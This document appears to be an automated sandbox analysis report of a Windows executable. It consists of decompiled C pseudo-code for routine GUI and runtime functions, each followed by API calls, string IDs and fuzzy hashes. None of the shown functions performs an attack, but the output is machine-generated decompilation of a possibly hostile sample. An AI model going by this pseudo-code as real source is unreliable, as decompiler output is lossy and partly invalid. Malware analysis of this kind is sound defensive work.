                                                                        • Instruction Fuzzy Hash: 16411E74B00214AFDB01EFA6C891E9EB7F9FB89704F5144A6F800EB751CA75AD01CB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E0043478C(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, void* __ebp, long long __fp0) {
                                                                        				intOrPtr _v16;
                                                                        				intOrPtr _t24;
                                                                        				intOrPtr _t26;
                                                                        				intOrPtr _t28;
                                                                        				intOrPtr* _t31;
                                                                        				intOrPtr _t34;
                                                                        				intOrPtr _t36;
                                                                        				struct HWND__* _t37;
                                                                        				intOrPtr _t38;
                                                                        				intOrPtr* _t40;
                                                                        				intOrPtr _t44;
                                                                        				intOrPtr _t48;
                                                                        				intOrPtr* _t52;
                                                                        				long _t57;
                                                                        				intOrPtr _t58;
                                                                        				intOrPtr _t59;
                                                                        				intOrPtr* _t64;
                                                                        				intOrPtr _t65;
                                                                        				intOrPtr _t69;
                                                                        				intOrPtr* _t76;
                                                                        				void* _t78;
                                                                        				intOrPtr* _t79;
                                                                        				long long _t86;
                                                                        
                                                                        				_t86 = __fp0;
                                                                        				_t79 = _t78 + 0xfffffff8;
                                                                        				_t69 = __ecx;
                                                                        				_t44 = __edx;
                                                                        				_t76 = __eax;
                                                                        				 *0x496b8c = __eax;
                                                                        				_t24 =  *0x496b8c; // 0x0
                                                                        				 *((intOrPtr*)(_t24 + 4)) = 0;
                                                                        				GetCursorPos(0x496b98);
                                                                        				_t26 =  *0x496b8c; // 0x0
                                                                        				_t57 = 0x496b98->x; // 0x0
                                                                        				 *(_t26 + 0xc) = _t57;
                                                                        				_t58 =  *0x496b9c; // 0x0
                                                                        				 *((intOrPtr*)(_t26 + 0x10)) = _t58;
                                                                        				 *0x496ba0 = GetCursor();
                                                                        				_t28 =  *0x496b8c; // 0x0
                                                                        				"SPhP;C"();
                                                                        				 *0x496b94 = _t28;
                                                                        				 *0x496ba4 = _t69;
                                                                        				_t59 =  *0x4311cc; // 0x431218
                                                                        				if(E00403768(_t76, _t59) == 0) {
                                                                        					__eflags = _t44;
                                                                        					if(__eflags == 0) {
                                                                        						 *0x496ba8 = 0;
                                                                        					} else {
                                                                        						 *0x496ba8 = 1;
                                                                        					}
                                                                        				} else {
                                                                        					_t64 = _t76;
                                                                        					_t4 = _t64 + 0x44; // 0x44
                                                                        					_t40 = _t4;
                                                                        					_t48 =  *_t40;
                                                                        					if( *((intOrPtr*)(_t40 + 8)) - _t48 <= 0) {
                                                                        						__eflags = 0;
                                                                        						 *((intOrPtr*)(_t64 + 0x20)) = 0;
                                                                        						 *((intOrPtr*)(_t64 + 0x24)) = 0;
                                                                        					} else {
                                                                        						 *_t79 =  *((intOrPtr*)(_t64 + 0xc)) - _t48;
                                                                        						asm("fild dword [esp]");
                                                                        						_v16 =  *((intOrPtr*)(_t40 + 8)) -  *_t40;
                                                                        						asm("fild dword [esp+0x4]");
                                                                        						asm("fdivp st1, st0");
                                                                        						 *((long long*)(_t64 + 0x20)) = __fp0;
                                                                        						asm("wait");
                                                                        					}
                                                                        					_t65 =  *((intOrPtr*)(_t40 + 4));
                                                                        					if( *((intOrPtr*)(_t40 + 0xc)) - _t65 <= 0) {
                                                                        						__eflags = 0;
                                                                        						 *((intOrPtr*)(_t76 + 0x28)) = 0;
                                                                        						 *((intOrPtr*)(_t76 + 0x2c)) = 0;
                                                                        					} else {
                                                                        						_t52 = _t76;
                                                                        						 *_t79 =  *((intOrPtr*)(_t52 + 0x10)) - _t65;
                                                                        						asm("fild dword [esp]");
                                                                        						_v16 =  *((intOrPtr*)(_t40 + 0xc)) -  *((intOrPtr*)(_t40 + 4));
                                                                        						asm("fild dword [esp+0x4]");
                                                                        						asm("fdivp st1, st0");
                                                                        						 *((long long*)(_t52 + 0x28)) = _t86;
                                                                        						asm("wait");
                                                                        					}
                                                                        					if(_t44 == 0) {
                                                                        						 *0x496ba8 = 0;
                                                                        					} else {
                                                                        						 *0x496ba8 = 2;
                                                                        						 *((intOrPtr*)( *_t76 + 0x30))();
                                                                        					}
                                                                        				}
                                                                        				_t31 =  *0x496b8c; // 0x0
                                                                        				 *0x496bac =  *((intOrPtr*)( *_t31 + 8))();
                                                                        				_t84 =  *0x496bac;
                                                                        				if( *0x496bac != 0) {
                                                                        					_t36 =  *0x496b9c; // 0x0
                                                                        					_t37 = GetDesktopWindow();
                                                                        					_t38 =  *0x496bac; // 0x0
                                                                        					E0043E5DC(_t38, _t37, _t84, _t36);
                                                                        				}
                                                                        				_t34 = E004035AC(1);
                                                                        				 *0x496bb4 = _t34;
                                                                        				if( *0x496ba8 != 0) {
                                                                        					_t34 = E004344BC(0x496b98, 1);
                                                                        				}
                                                                        				return _t34;
                                                                        			}



























                                                                        APIs
                                                                        • GetCursorPos.USER32(00496B98), ref: 004347AD
                                                                        • GetCursor.USER32(00496B98), ref: 004347C9
                                                                          • Part of subcall function 004339CC: SetCapture.USER32(00000000,?,004347DD,00496B98), ref: 004339DB
                                                                        • GetDesktopWindow.USER32 ref: 004348BB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Cursor$CaptureDesktopWindow
                                                                        • String ID: 8C
                                                                        • API String ID: 669539147-1061565219
                                                                        • Opcode ID: a4fa84824f4e5cf1615e483614cf6fe70a484704f0cac04b0c9c92be734f6c2e
                                                                        • Instruction ID: 23d7adcb388defc9bd6fa9e8aedec287cf5aea9bdfeb159da65cc808b88cf330
                                                                        • Opcode Fuzzy Hash: a4fa84824f4e5cf1615e483614cf6fe70a484704f0cac04b0c9c92be734f6c2e
                                                                        • Instruction Fuzzy Hash: CB416AB46042508FC708EF69E944656BBE1ABD8318F26C57FD449CB3A2EB35F841CB49
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E0040A590(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                        				char _v8;
                                                                        				struct _MEMORY_BASIC_INFORMATION _v36;
                                                                        				char _v297;
                                                                        				char _v304;
                                                                        				intOrPtr _v308;
                                                                        				char _v312;
                                                                        				char _v316;
                                                                        				char _v320;
                                                                        				intOrPtr _v324;
                                                                        				char _v328;
                                                                        				void* _v332;
                                                                        				char _v336;
                                                                        				char _v340;
                                                                        				char _v344;
                                                                        				char _v348;
                                                                        				intOrPtr _v352;
                                                                        				char _v356;
                                                                        				char _v360;
                                                                        				char _v364;
                                                                        				void* _v368;
                                                                        				char _v372;
                                                                        				intOrPtr _t52;
                                                                        				intOrPtr _t60;
                                                                        				intOrPtr _t82;
                                                                        				intOrPtr _t86;
                                                                        				intOrPtr _t89;
                                                                        				intOrPtr _t101;
                                                                        				void* _t108;
                                                                        				intOrPtr _t110;
                                                                        				void* _t113;
                                                                        
                                                                        				_t108 = __edi;
                                                                        				_v372 = 0;
                                                                        				_v336 = 0;
                                                                        				_v344 = 0;
                                                                        				_v340 = 0;
                                                                        				_v8 = 0;
                                                                        				_push(_t113);
                                                                        				_push(0x40a74b);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t113 + 0xfffffe90;
                                                                        				_t89 =  *((intOrPtr*)(_a4 - 4));
                                                                        				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
                                                                        					_t52 =  *0x495ad4; // 0x4075d4
                                                                        					E00406548(_t52,  &_v8);
                                                                        				} else {
                                                                        					_t86 =  *0x495c54; // 0x4075cc
                                                                        					E00406548(_t86,  &_v8);
                                                                        				}
                                                                        				_t110 =  *((intOrPtr*)(_t89 + 0x18));
                                                                        				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
                                                                        				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
                                                                        					_v368 =  *(_t89 + 0xc);
                                                                        					_v364 = 5;
                                                                        					_v360 = _v8;
                                                                        					_v356 = 0xb;
                                                                        					_v352 = _t110;
                                                                        					_v348 = 5;
                                                                        					_t60 =  *0x495ba8; // 0x407574
                                                                        					E00406548(_t60,  &_v372);
                                                                        					E0040A1B8(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
                                                                        				} else {
                                                                        					_v332 =  *(_t89 + 0xc);
                                                                        					_v328 = 5;
                                                                        					E004045B0( &_v340, 0x105,  &_v297);
                                                                        					E00408AC8(_v340,  &_v336);
                                                                        					_v324 = _v336;
                                                                        					_v320 = 0xb;
                                                                        					_v316 = _v8;
                                                                        					_v312 = 0xb;
                                                                        					_v308 = _t110;
                                                                        					_v304 = 5;
                                                                        					_t82 =  *0x495b4c; // 0x407624
                                                                        					E00406548(_t82,  &_v344);
                                                                        					E0040A1B8(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
                                                                        				}
                                                                        				_pop(_t101);
                                                                        				 *[fs:eax] = _t101;
                                                                        				_push(E0040A752);
                                                                        				E00404348( &_v372);
                                                                        				E0040436C( &_v344, 3);
                                                                        				return E00404348( &_v8);
                                                                        			}

                                                                        APIs
                                                                        • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040A74B), ref: 0040A5FB
                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040A74B), ref: 0040A61D
                                                                          • Part of subcall function 00406548: LoadStringA.USER32 ref: 00406579
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: FileLoadModuleNameQueryStringVirtual
                                                                        • String ID: $v@$tu@
                                                                        • API String ID: 902310565-2066366626
                                                                        • Opcode ID: 9ba32f01379c519203fd593cd7103645b6150b85267e70208000b084934e0a5e
                                                                        • Instruction ID: b8250315685de19ce3eef807cd591484c91ae11c3ead26debf93d0050c9e99c4
                                                                        • Opcode Fuzzy Hash: 9ba32f01379c519203fd593cd7103645b6150b85267e70208000b084934e0a5e
                                                                        • Instruction Fuzzy Hash: B0410470900628DFDB61DF64CC85BDAB7F4AB49304F4140EAE908AB391D778AE84CF95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0043C824(void* __eax, intOrPtr __ecx, intOrPtr __edx) {
                                                                        				char _t23;
                                                                        				struct HWND__* _t42;
                                                                        				void* _t43;
                                                                        				intOrPtr _t47;
                                                                        				void* _t54;
                                                                        				void* _t56;
                                                                        				void* _t57;
                                                                        				void* _t58;
                                                                        				intOrPtr* _t59;
                                                                        
                                                                        				 *((intOrPtr*)(_t59 + 4)) = __ecx;
                                                                        				 *_t59 = __edx;
                                                                        				_t54 = __eax;
                                                                        				_t42 =  *(__eax + 0x180);
                                                                        				if(_t42 == 0 || IsWindowVisible(_t42) == 0) {
                                                                        					_t23 = 0;
                                                                        				} else {
                                                                        					_t23 = 1;
                                                                        				}
                                                                        				 *((char*)(_t59 + 8)) = _t23;
                                                                        				if( *((char*)(_t59 + 8)) != 0) {
                                                                        					ScrollWindow( *(_t54 + 0x180),  *(_t59 + 0xc),  *(_t59 + 0xc), 0, 0);
                                                                        				}
                                                                        				_t56 = E00439AB4(_t54) - 1;
                                                                        				if(_t56 < 0) {
                                                                        					L14:
                                                                        					return E00439644();
                                                                        				} else {
                                                                        					_t57 = _t56 + 1;
                                                                        					_t58 = 0;
                                                                        					do {
                                                                        						_t43 = E00439A78(_t54, _t58);
                                                                        						_t47 =  *0x4323f0; // 0x43243c
                                                                        						if(E00403768(_t43, _t47) == 0 ||  *(_t43 + 0x180) == 0) {
                                                                        							 *((intOrPtr*)(_t43 + 0x40)) =  *((intOrPtr*)(_t43 + 0x40)) +  *_t59;
                                                                        							 *((intOrPtr*)(_t43 + 0x44)) =  *((intOrPtr*)(_t43 + 0x44)) +  *((intOrPtr*)(_t59 + 4));
                                                                        						} else {
                                                                        							if( *((char*)(_t59 + 8)) == 0) {
                                                                        								SetWindowPos( *(_t43 + 0x180), 0,  *((intOrPtr*)(_t43 + 0x40)) +  *((intOrPtr*)(_t59 + 0x10)),  *((intOrPtr*)(_t34 + 0x44)) +  *((intOrPtr*)(_t59 + 0x10)),  *(_t34 + 0x48),  *(_t34 + 0x4c), 0x14);
                                                                        							}
                                                                        						}
                                                                        						_t58 = _t58 + 1;
                                                                        						_t57 = _t57 - 1;
                                                                        					} while (_t57 != 0);
                                                                        					goto L14;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • IsWindowVisible.USER32(?), ref: 0043C83F
                                                                        • ScrollWindow.USER32 ref: 0043C86E
                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0043C8E4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Window$ScrollVisible
                                                                        • String ID: <$C
                                                                        • API String ID: 4127837035-3423417450
                                                                        • Opcode ID: a5d84af2d4f07ff20e143fdc83744df652cb0839f96734090538049e476dac64
                                                                        • Instruction ID: 2152d0f343ca8ced43e7147e59c3894d671bac6e37dc3256dc1c566f4991c98f
                                                                        • Opcode Fuzzy Hash: a5d84af2d4f07ff20e143fdc83744df652cb0839f96734090538049e476dac64
                                                                        • Instruction Fuzzy Hash: CD21DB31604340ABC714EA69CCC0B6BB7E8AF8C305F14956EF648DB352D638ED01879A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 45%
                                                                        			E0046CC50(void* __ebx, void* __esi) {
                                                                        				char _v8;
                                                                        				char _v12;
                                                                        				intOrPtr _v16;
                                                                        				char _v20;
                                                                        				char _v24;
                                                                        				void* _t24;
                                                                        				intOrPtr _t29;
                                                                        				intOrPtr _t35;
                                                                        				void* _t40;
                                                                        				intOrPtr _t45;
                                                                        				intOrPtr _t47;
                                                                        				void* _t49;
                                                                        				void* _t51;
                                                                        				void* _t52;
                                                                        				intOrPtr _t53;
                                                                        
                                                                        				_t51 = _t52;
                                                                        				_t53 = _t52 + 0xffffffec;
                                                                        				_v8 = 0;
                                                                        				_push(_t51);
                                                                        				_push(0x46cd28);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t53;
                                                                        				if( *0x496c98 != 0) {
                                                                        					L6:
                                                                        					_pop(_t45);
                                                                        					 *[fs:eax] = _t45;
                                                                        					_push(0x46cd2f);
                                                                        					return E00404348( &_v8);
                                                                        				} else {
                                                                        					E004043E0( &_v8, "comctl32.dll");
                                                                        					_push( &_v12);
                                                                        					_t24 = E004047F8(_v8);
                                                                        					_t49 = _t24;
                                                                        					_push(_t49);
                                                                        					L00406AAC();
                                                                        					_t40 = _t24;
                                                                        					if(_t40 == 0) {
                                                                        						goto L6;
                                                                        					} else {
                                                                        						_v16 = E00402754(_t40);
                                                                        						_push(_t51);
                                                                        						_push(0x46cd05);
                                                                        						_push( *[fs:eax]);
                                                                        						 *[fs:eax] = _t53;
                                                                        						_push(_v16);
                                                                        						_push(_t40);
                                                                        						_t29 = _v12;
                                                                        						_push(_t29);
                                                                        						_push(_t49);
                                                                        						L00406AA4();
                                                                        						if(_t29 != 0) {
                                                                        							_push( &_v24);
                                                                        							_push( &_v20);
                                                                        							_push("\\");
                                                                        							_t35 = _v16;
                                                                        							_push(_t35);
                                                                        							L00406AB4();
                                                                        							if(_t35 != 0) {
                                                                        								 *0x496c98 =  *((intOrPtr*)(_v20 + 8));
                                                                        							}
                                                                        						}
                                                                        						_pop(_t47);
                                                                        						 *[fs:eax] = _t47;
                                                                        						_push(0x46cd0c);
                                                                        						return E00402774(_v16);
                                                                        					}
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        • 739414E0.VERSION(00000000,?,00000000,0046CD28), ref: 0046CC94
                                                                        • 739414C0.VERSION(00000000,?,00000000,?,00000000,0046CD05,?,00000000,?,00000000,0046CD28), ref: 0046CCC1
                                                                        • 73941500.VERSION(?,0046CD50,?,?,00000000,?,00000000,?,00000000,0046CD05,?,00000000,?,00000000,0046CD28), ref: 0046CCDB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: 739414$73941500
                                                                        • String ID: comctl32.dll
                                                                        • API String ID: 1696551078-431930879
                                                                        • Opcode ID: 4370ec33bb2a3535abdd9756b92c62f29a947cde4d107e1b0ccf349f1ab6d9cc
                                                                        • Instruction ID: 7ec7435803e1971a03311a5c6c3e11d69c247d37a00d9ae0bfaa4f5d1cfef9b6
                                                                        • Opcode Fuzzy Hash: 4370ec33bb2a3535abdd9756b92c62f29a947cde4d107e1b0ccf349f1ab6d9cc
                                                                        • Instruction Fuzzy Hash: 8D214F75600208AFDB01EFA9DC91DAE77FCEB49300B524477F944E3691E778AE008A69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 59%
                                                                        			E00424D94(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr _t62;
                                                                        				intOrPtr _t64;
                                                                        				intOrPtr _t67;
                                                                        				void* _t77;
                                                                        				void* _t78;
                                                                        				intOrPtr _t79;
                                                                        				intOrPtr _t80;
                                                                        
                                                                        				_t77 = _t78;
                                                                        				_t79 = _t78 + 0xfffffff8;
                                                                        				_v8 = __eax;
                                                                        				_v12 = E004035AC(1);
                                                                        				_push(_t77);
                                                                        				_push(0x424e1b);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t79;
                                                                        				 *((intOrPtr*)(_v12 + 8)) = __edx;
                                                                        				 *((intOrPtr*)(_v12 + 0x10)) = __ecx;
                                                                        				memcpy(_v12 + 0x18, _a12, 0x15 << 2);
                                                                        				_t80 = _t79 + 0xc;
                                                                        				 *((char*)(_v12 + 0x70)) = _a8;
                                                                        				if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
                                                                        					 *((intOrPtr*)(_v12 + 0x14)) =  *((intOrPtr*)(_v12 + 8));
                                                                        				}
                                                                        				_t62 =  *0x41232c; // 0x412378
                                                                        				 *((intOrPtr*)(_v12 + 0x6c)) = E0040378C(_a4, _t62);
                                                                        				_pop(_t64);
                                                                        				 *[fs:eax] = _t64;
                                                                        				_push(0x496a44);
                                                                        				L004068AC();
                                                                        				_push(_t77);
                                                                        				_push(0x424e7b);
                                                                        				_push( *[fs:edx]);
                                                                        				 *[fs:edx] = _t80;
                                                                        				E00423828( *((intOrPtr*)(_v8 + 0x28)));
                                                                        				 *((intOrPtr*)(_v8 + 0x28)) = _v12;
                                                                        				E00423824(_v12);
                                                                        				_pop(_t67);
                                                                        				 *[fs:eax] = _t67;
                                                                        				_push(E00424E82);
                                                                        				_push(0x496a44);
                                                                        				L004069F4();
                                                                        				return 0;
                                                                        			}













                                                                        APIs
                                                                        • RtlEnterCriticalSection.KERNEL32(00496A44,00000000,?,?), ref: 00424E37
                                                                        • RtlLeaveCriticalSection.KERNEL32(00496A44,00424E82,00496A44,00000000,?,?), ref: 00424E75
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CriticalSection$EnterLeave
                                                                        • String ID: x#A$A
                                                                        • API String ID: 3168844106-3646173994
                                                                        • Opcode ID: 5bbfe59eb37763ef439f0b7999e1da932612e69aa8afa73a8559403d71184419
                                                                        • Instruction ID: 96df8752f16c2a0022fc4abf683c0cece092d4dd73ebd9113d8584cb1a2c50fe
                                                                        • Opcode Fuzzy Hash: 5bbfe59eb37763ef439f0b7999e1da932612e69aa8afa73a8559403d71184419
                                                                        • Instruction Fuzzy Hash: FC217175A04304AFDB11DF69D88184ABBF5FB89720B5285AAF804A7761C678EE40CB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E00449AD8(intOrPtr* __eax) {
                                                                        				struct tagMENUITEMINFOA _v128;
                                                                        				intOrPtr _v132;
                                                                        				int _t16;
                                                                        				intOrPtr* _t29;
                                                                        				struct HMENU__* _t36;
                                                                        				MENUITEMINFOA* _t37;
                                                                        
                                                                        				_t37 =  &_v128;
                                                                        				_t29 = __eax;
                                                                        				_t16 =  *0x495c50; // 0x4967f0
                                                                        				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
                                                                        					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
                                                                        					_t37->cbSize = 0x2c;
                                                                        					_v132 = 0x10;
                                                                        					_v128.hbmpUnchecked =  &(_v128.cch);
                                                                        					_v128.dwItemData = 0x50;
                                                                        					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
                                                                        					if(_t16 != 0) {
                                                                        						_t16 = E00449E5C(_t29);
                                                                        						asm("sbb edx, edx");
                                                                        						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
                                                                        							_v128.cbSize = ((E00449E5C(_t29) & 0x0000007f) << 0x0000000d) + ((E00449E5C(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
                                                                        							_v132 = 0x10;
                                                                        							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
                                                                        							if(_t16 != 0) {
                                                                        								return DrawMenuBar( *(_t29 + 0x38));
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t16;
                                                                        			}










                                                                        APIs
                                                                        • GetMenuItemInfoA.USER32 ref: 00449B26
                                                                        • SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 00449B78
                                                                        • DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 00449B85
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Menu$InfoItem$Draw
                                                                        • String ID: P
                                                                        • API String ID: 3227129158-3110715001
                                                                        • Opcode ID: 607a6fc08d128d85e62244aadbe68778596dafd5a8d92c3366002aec936c2e1b
                                                                        • Instruction ID: df4e8d69c2b8ab43fa3eab23de6c9c49e1d9bdfb9557a38750246fd9a3c36f3e
                                                                        • Opcode Fuzzy Hash: 607a6fc08d128d85e62244aadbe68778596dafd5a8d92c3366002aec936c2e1b
                                                                        • Instruction Fuzzy Hash: 5C116A30605A006BE310DB29CC81B4B7BD5EF8A364F14866AF094DB3D5D779DC859B8A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0043E42C(struct HWND__* __eax, intOrPtr __ecx, char __edx, char _a4) {
                                                                        				intOrPtr _v8;
                                                                        				char _v12;
                                                                        				struct tagRECT _v28;
                                                                        				intOrPtr _t19;
                                                                        				struct HWND__* _t20;
                                                                        				intOrPtr* _t23;
                                                                        
                                                                        				_t20 = __eax;
                                                                        				_t1 =  &_a4; // 0x43e6e8
                                                                        				_t23 =  *_t1;
                                                                        				_v12 = __edx;
                                                                        				_v8 = __ecx;
                                                                        				_t4 =  &_v12; // 0x43e6e8
                                                                        				ClientToScreen(__eax, _t4);
                                                                        				GetWindowRect(_t20,  &_v28);
                                                                        				_t6 =  &_v12; // 0x43e6e8
                                                                        				 *_t23 =  *_t6 - _v28.left;
                                                                        				_t19 = _v8 - _v28.top;
                                                                        				 *((intOrPtr*)(_t23 + 4)) = _t19;
                                                                        				return _t19;
                                                                        			}










                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: ClientRectScreenWindow
                                                                        • String ID: C$C
                                                                        • API String ID: 3371951266-238425240
                                                                        • Opcode ID: 9b613976ed8a943dd8438ef2838c6135eb1e66a4e2bc89180cf3e15dbfc731bf
                                                                        • Instruction ID: 1f4564615450670a25db1ca0009ad4615392a475f3aeb3dbd1faee911e03ac16
                                                                        • Opcode Fuzzy Hash: 9b613976ed8a943dd8438ef2838c6135eb1e66a4e2bc89180cf3e15dbfc731bf
                                                                        • Instruction Fuzzy Hash: D2F0A2B190120DAFCB00DFE9D9818DEFBFCEF08210F10416AA945E3341D631AA508BA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040B418() {
                                                                        				_Unknown_base(*)()* _t1;
                                                                        				struct HINSTANCE__* _t3;
                                                                        
                                                                        				_t1 = GetModuleHandleA("kernel32.dll");
                                                                        				_t3 = _t1;
                                                                        				if(_t3 != 0) {
                                                                        					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
                                                                        					 *0x47a0e4 = _t1;
                                                                        				}
                                                                        				if( *0x47a0e4 == 0) {
                                                                        					 *0x47a0e4 = E00408B84;
                                                                        					return E00408B84;
                                                                        				}
                                                                        				return _t1;
                                                                        			}






                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C0F1,00000000,0040C104), ref: 0040B41E
                                                                        • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040B42F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
